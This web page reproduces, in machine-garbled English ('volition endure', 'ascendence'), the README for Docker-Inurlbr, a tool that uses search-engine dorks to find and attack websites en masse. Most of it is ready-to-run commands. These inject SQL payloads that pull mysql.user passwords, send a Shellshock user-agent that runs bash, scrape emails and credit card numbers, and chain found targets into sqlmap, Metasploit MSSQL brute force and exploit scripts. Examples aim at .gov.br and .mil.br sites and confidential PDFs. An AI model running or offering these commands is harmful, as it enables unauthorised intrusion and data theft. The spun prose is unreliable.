Docker-Inurlbr - Advanced Search Inwards Search Engines, Enables Analysis Provided To Exploit Leave Of Absence / Post Capturing Emails & Urls
Advanced search inward search engines, enables analysis provided to exploit GET / POST capturing emails & urls, alongside an internal custom validation junction for each target / url found.
How to build
git clone https://github.com/gmdutra/docker-inurlbr.git cd docker-inurlbr docker create -t gmdutra/inurlbr .
Run
docker run --name inurlbr -it -d gmdutra/inurlbr
- HELP:
-h --help Alternative long length care command. --ajuda Command to specify Help. --info Information script. --update Code update. -q Choose which search engine you lot desire through [1...24] / [e1..6]]: [options]: 1 - GOOGLE / (CSE) GENERIC RANDOM / API two - BING three - YAHOO BR 4 - ASK v - HAO123 BR six - GOOGLE (API) seven - LYCOS 8 - UOL BR nine - YAHOO the States 10 - SAPO xi - DMOZ 12 - GIGABLAST xiii - NEVER fourteen - BAIDU BR xv - YANDEX xvi - ZOO 17 - HOTBOT eighteen - ZHONGSOU xix - HKSEARCH xx - EZILION 21 - SOGOU 22 - DUCK DUCK GO 23 - BOOROW 24 - GOOGLE(CSE) GENERIC RANDOM ---------------------------------------- SPECIAL MOTORS ---------------------------------------- e1 - TOR FIND e2 - ELEPHANT e3 - TORSEARCH e4 - WIKILEAKS e5 - OTN e6 - EXPLOITS SHODAN ---------------------------------------- all - All search engines / non exceptional motors Default: 1 Example: -q {op} Usage: -q 1 -q v Using to a greater extent than than i engine: -q 1,2,5,6,11,24 Using all engines: -q all --proxy Choose which proxy you lot desire to work through the search engine: Example: --proxy {proxy:port} Usage: --proxy localhost:8118 --proxy socks5://googleinurl@localhost:9050 --proxy http://admin:12334@172.16.0.90:8080 --proxy-file Set font file to randomize your proxy to each search engine. Example: --proxy-file {proxys} Usage: --proxy-file proxys_list.txt --time-proxy Set the fourth dimension how oftentimes the proxy volition endure exchanged. Example: --time-proxy {second} Usage: --time-proxy 10 --proxy-http-file Set file alongside urls http proxy, are used to bular capch search engines Example: --proxy-http-file {youfilehttp} Usage: --proxy-http-file http_proxys.txt --tor-random Enables the TOR function, each usage links an unique IP. -t Choose the validation type: op 1, 2, 3, 4, v [options]: 1 - The start type uses default errors considering the script: It establishes connecter alongside the exploit through the instruct method. Demo: www.alvo.com.br/pasta/index.php?id={exploit} two - The minute type tries to valid the mistake defined by: -a='VALUE_INSIDE_THE _TARGET' It likewise establishes connecter alongside the exploit through the instruct method Demo: www.alvo.com.br/pasta/index.php?id={exploit} three - The 3rd type combine both start in addition to minute types: Then, of course, it likewise establishes connecter alongside the exploit through the instruct method Demo: www.target.com.br{exploit} Default: 1 Example: -t {op} Usage: -t 1 4 - The quaternary type a validation based on source file in addition to volition endure enabled scanner measure functions. The source file their values are concatenated alongside target url. - Set your target alongside ascendence --target {http://target} - Set your file alongside ascendence -o {file} Explicative: Source file values: /admin/index.php?id= /pag/index.php?id= /brazil.php?new= Demo: www.target.com.br/admin/index.php?id={exploit} www.target.com.br/pag/index.php?id={exploit} www.target.com.br/brazil.php?new={exploit} v - (FIND PAGE) The 5th type of validation based on the source file, Will endure enabled solely i validation code 200 on the target server, or if the url submit such code volition endure considered vulnerable. - Set your target alongside ascendence --target {http://target} - Set your file alongside ascendence -o {file} Explicative: Source file values: /admin/admin.php /admin.asp /admin.aspx Demo: www.target.com.br/admin/admin.php www.target.com.br/admin.asp www.target.com.br/admin.aspx Observation: If it shows the code 200 volition endure separated inward the output file DEFAULT ERRORS: [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL, [*]ZEND FRAMEWORK, [*]ERROR MARIADB, [*]ERROR MYSQL, [*]ERROR JBOSSWEB, [*]ERROR MICROSOFT, [*]ERROR ODBC, [*]ERROR POSTGRESQL, [*]ERROR JAVA INFINITYDB, [*]ERROR PHP, [*]CMS WORDPRESS, [*]SHELL WEB, [*]ERROR JDBC, [*]ERROR ASP, [*]ERROR ORACLE, [*]ERROR DB2, [*]JDBC CFM, [*]ERROS LUA, [*]ERROR INDEFINITE --dork Defines which dork the search engine volition use. Example: --dork {dork} Usage: --dork 'site:.gov.br inurl:php? id' - Using multiples dorks: Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3} Usage: --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp' --dork-file Set font file alongside your search dorks. Example: --dork-file {dork_file} Usage: --dork-file 'dorks.txt' --exploit-get Defines which exploit volition endure injected through the GET method to each URL found. Example: --exploit-get {exploit_get} Usage: --exploit-get "?'´%270x27;" --exploit-post Defines which exploit volition endure injected through the POST method to each URL found. Example: --exploit-post {exploit_post} Usage: --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok' --exploit-command Defines which exploit/parameter volition endure executed inward the options: --command-vul/ --command-all. The exploit-command volition endure identified yesteryear the paramaters: --command-vul/ --command-all equally _EXPLOIT_ Ex --exploit-command '/admin/config.conf' --command-all 'curl -v _TARGET__EXPLOIT_' _TARGET_ is the specified URL/TARGET obtained yesteryear the procedure _EXPLOIT_ is the exploit/parameter defined yesteryear the selection --exploit-command. Example: --exploit-command {exploit-command} Usage: --exploit-command '/admin/config.conf' -a Specify the string that volition endure used on the search script: Example: -a {string} Usage: -a '<title>hello world</title>' -d Specify the script usage op 1, 2, 3, 4, 5. Example: -d {op} Usage: -d 1 /URL of the search engine. -d two /Show all the url. -d three /Detailed asking of every URL. -d 4 /Shows the HTML of every URL. -d v /Detailed asking of all URLs. -d six /Detailed PING - PONG irc. -s Specify the output file where it volition endure saved the vulnerable URLs. Example: -s {file} Usage: -s your_file.txt -o Manually care the vulnerable URLs you lot desire to work from a file, without using a search engine. Example: -o {file_where_my_urls_are} Usage: -o tests.txt --persist Attempts when Google blocks your search. The script tries to closed to other google host / default = 4 Example: --persist {number_attempts} Usage: --persist seven --ifredirect Return validation method post REDIRECT_URL Example: --ifredirect {string_validation} Usage: --ifredirect '/admin/painel.php' -m Enable the search for emails on the urls specified. -u Enables the search for URL lists on the url specified. --gc Enable validation of values with google webcache. --pr Progressive scan, used to laid upwards operators (dorks), makes the search of a dork in addition to valid results, therefore goes a dork at a time. --file-cookie Open cookie file. --save-as Save results inward a for sure place. --shellshock Explore shellshock vulnerability yesteryear setting a malicious user-agent. --popup Run --command all or vuln inward a parallel terminal. --cms-check Enable uncomplicated cheque if the url / target is using CMS. --no-banner Remove the script presentation banner. --unique Filter results inward unique domains. --beep Beep audio when a vulnerability is found. --alexa-rank Show alexa positioning inward the results. --robots Show values file robots. --range Set attain IP. Example: --range {range_start,rage_end} Usage: --range '172.16.0.5#172.16.0.255' --range-rand Set sum of random ips. Example: --range-rand {rand} Usage: --range-rand '50' --irc Sending vulnerable to IRC / server channel. Example: --irc {server#channel} Usage: --irc 'irc.rizon.net#inurlbrasil' --http-header Set HTTP header. Example: --http-header {youemail} Usage: --http-header 'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"' --sedmail Sending vulnerable to email. Example: --sedmail {youemail} Usage: --sedmail youemail@inurl.com.br --delay Delay betwixt interrogation processes. Example: --delay {second} Usage: --delay 10 --time-out Timeout to move out the process. Example: --time-out {second} Usage: --time-out 10 --ifurl Filter URLs based on their argument. Example: --ifurl {ifurl} Usage: --ifurl index.php?id= --ifcode Valid results based on your render http code. Example: --ifcode {ifcode} Usage: --ifcode 200 --ifemail Filter E-mails based on their argument. Example: --ifemail {file_where_my_emails_are} Usage: --ifemail sp.gov.br --url-reference Define referring URL inward the asking to ship him against the target. Example: --url-reference {url} Usage: --url-reference http://target.com/admin/user/valid.php --mp Limits the release of pages inward the search engines. Example: --mp {limit} Usage: --mp l --user-agent Define the user agent used inward its asking against the target. Example: --user-agent {agent} Usage: --user-agent 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11' Usage-exploit / SHELLSHOCK: --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"' Complete command: php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t two -a '99887766555' --sall Saves all urls found yesteryear the scanner. Example: --sall {file} Usage: --sall your_file.txt --command-vul Every vulnerable URL found volition execute this ascendence parameters. Example: --command-vul {command} Usage: --command-vul 'nmap sV -p 22,80,21 _TARGET_' --command-vul './exploit.sh _TARGET_ output.txt' --command-vul 'php miniexploit.php -t _TARGET_ -s output.txt' --command-all Use this commmand to specify a unmarried ascendence to EVERY URL found. Example: --command-all {command} Usage: --command-all 'nmap sV -p 22,80,21 _TARGET_' --command-all './exploit.sh _TARGET_ output.txt' --command-all 'php miniexploit.php -t _TARGET_ -s output.txt' [!] Observation: _TARGET_ volition endure replaced yesteryear the URL/target found, although if the user doesn't input the get, solely the domain volition endure executed. _TARGETFULL_ volition endure replaced yesteryear the master copy URL / target found. _TARGETXPL_ volition endure replaced yesteryear the master copy URL / target found + EXPLOIT --exploit-get. _TARGETIP_ render of ip URL / target found. _URI_ Back URL laid upwards of folders / target found. _RANDOM_ Random strings. _PORT_ Capture port of the electrical current test, inside the --port-scan process. _EXPLOIT_ volition endure replaced yesteryear the specified ascendence declaration --exploit-command. The exploit-command volition endure identified yesteryear the parameters --command-vul/ --command-all equally _EXPLOIT_ --replace Replace values in the target URL. Example: --replace {value_old[INURL]value_new} Usage: --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1' --replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1' --replace 'index.aspx?id=[INURL]index.aspx?id=1%27´' --remove Remove values in the target URL. Example: --remove {string} Usage: --remove '/admin.php?id=0' --regexp Using regular human face to validate his research, the value of the Expression volition endure sought inside the target/URL. Example: --regexp {regular_expression} All Major Credit Cards: Usage: --regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})' IP Addresses: Usage: --regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))' EMAIL: Usage: --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)' ---regexp-filter Using regular human face to filter his research, the value of the Expression volition endure sought inside the target/URL. Example: ---regexp-filter {regular_expression} EMAIL: Usage: ---regexp-filter '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)' [!] Small commands manager: --exploit-cad Command register for work inside the scanner. Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND} Example Format: NMAP::nmap -sV _TARGET_ Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt Usage: --exploit-cad 'NMAP::nmap -sV _TARGET_' Observation: Each registered ascendence is identified yesteryear an id of your array. Commands are logged inward exploits.conf file. --exploit-all-id Execute commands, exploits based on id of use, (all) is run for each target found yesteryear the engine. Example: --exploit-all-id {id,id} Usage: --exploit-all-id 1,2,8,22 --exploit-vul-id Execute commands, exploits based on id of use, (vull) run ascendence solely if the target was considered vulnerable. Example: --exploit-vul-id {id,id} Usage: --exploit-vul-id 1,2,8,22 --exploit-list List all entries ascendence inward exploits.conf file. [!] Running subprocesses: --sub-file Subprocess performs an injection strings inward URLs found yesteryear the engine, via GET or POST. Example: --sub-file {youfile} Usage: --sub-file exploits_get.txt --sub-get defines whether the strings coming from --sub-file volition endure injected via GET. Usage: --sub-get --sub-post defines whether the strings coming from --sub-file volition endure injected via POST. Usage: --sub-get --sub-cmd-vul Each vulnerable URL found inside the sub-process volition execute the parameters of this command. Example: --sub-cmd-vul {command} Usage: --sub-cmd-vul 'nmap sV -p 22,80,21 _TARGET_' --sub-cmd-vul './exploit.sh _TARGET_ output.txt' --sub-cmd-vul 'php miniexploit.php -t _TARGET_ -s output.txt' --sub-cmd-all Run ascendence to each target found inside the sub-process scope. Example: --sub-cmd-all {command} Usage: --sub-cmd-all 'nmap sV -p 22,80,21 _TARGET_' --sub-cmd-all './exploit.sh _TARGET_ output.txt' --sub-cmd-all 'php miniexploit.php -t _TARGET_ -s output.txt' --port-scan Defines ports that volition endure validated equally open. Example: --port-scan {ports} Usage: --port-scan '22,21,23,3306' --port-cmd Define ascendence that runs when finding an opened upwards door. Example: --port-cmd {command} Usage: --port-cmd './xpl _TARGETIP_:_PORT_' --port-cmd './xpl _TARGETIP_/file.php?sqli=1' --port-write Send values for door. Example: --port-write {'value0','value1','value3'} Usage: --port-write "'NICK nk_test','USER nk_test 8 * :_ola','JOIN #inurlbrasil','PRIVMSG #inurlbrasil : minha_msg'" [!] Modifying values used inside script parameters: md5 Encrypt values inward md5. Example: md5({value}) Usage: md5(102030) Usage: --exploit-get 'user?id=md5(102030)' base64 Encrypt values inward base64. Example: base64({value}) Usage: base64(102030) Usage: --exploit-get 'user?id=base64(102030)' hex Encrypt values inward hex. Example: hex({value}) Usage: hex(102030) Usage: --exploit-get 'user?id=hex(102030)' Generate random values. Example: random({character_counter}) Usage: random(8) Usage: --exploit-get 'user?id=random(8)'
Simple Commands
docker exec inurlbr ./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;" docker exec inurlbr ./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;" docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;" docker exec inurlbr ./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t two --exploit-get '?' -a 'Index of /wp-content/uploads' docker exec inurlbr ./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t two --exploit-get '?' -a 'confidencial' docker exec inurlbr ./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t two --exploit-get '?' -a 'secreto' docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;" docker exec inurlbr ./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::' docker exec inurlbr ./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?´0x27 --command-vul 'nmap sV -p 22,80,21 _TARGET_' docker exec inurlbr ./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E' docker exec inurlbr ./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "_TARGETFULL_" --dbs' docker exec inurlbr ./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_' docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)' docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br electronic mail (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m docker exec inurlbr ./inurlbr.php --dork 'site:.gov.br electronic mail (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u docker exec inurlbr ./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6 docker exec inurlbr ./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, similar Gecko)' docker exec inurlbr ./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6 docker exec inurlbr ./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil' docker exec inurlbr ./inurlbr.php --dork 'inurl:"cgi-bin/login.cgi"' -s cgi.txt --ifurl 'cgi' --command-all 'php xplCGI.php _TARGET_' docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?´'%270x27;" docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find.txt -s output.txt -t 4 --exploit-get "?pass=1234" -a '<title>hello! admin</title>' docker exec inurlbr ./inurlbr.php --target 'http://target.com.br' -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t v docker exec inurlbr ./inurlbr.php --range '200.20.10.1,200.20.10.255' -s output.txt --command-all 'php roteador.php _TARGETIP_' docker exec inurlbr ./inurlbr.php --range-rad '1500' -s output.txt --command-all 'php roteador.php _TARGETIP_' docker exec inurlbr ./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8 docker exec inurlbr ./inurlbr.php --dork-rad '20' -s output.txt --exploit-get "?´'%270x27;" -q 1,2,6,4,5,9,7,8 --pr docker exec inurlbr ./inurlbr.php --dork-file 'dorksCGI.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --pr --shellshock docker exec inurlbr ./inurlbr.php --dork-file 'dorks_Wordpress_revslider.txt' -s output.txt -q 1,2,6,4,5,9,7,8 --sub-file 'xpls_Arbitrary_File_Download.txt'
Developers
---------------------------------------------- Original Version ---------------------------------------------- [+] AUTOR: googleINURL [+] EMAIL: inurlbr@gmail.com [+] Blog: http://blog.inurl.com.br ---------------------------------------------- Docker Version ---------------------------------------------- [+] AUTOR: Gabriel Dutra (c0olr00t) [+] EMAIL: gabrieldmdutra@gmail.com [+] LINKEDIN: linkedin.com/in/gmdutra/ ----------------------------------------------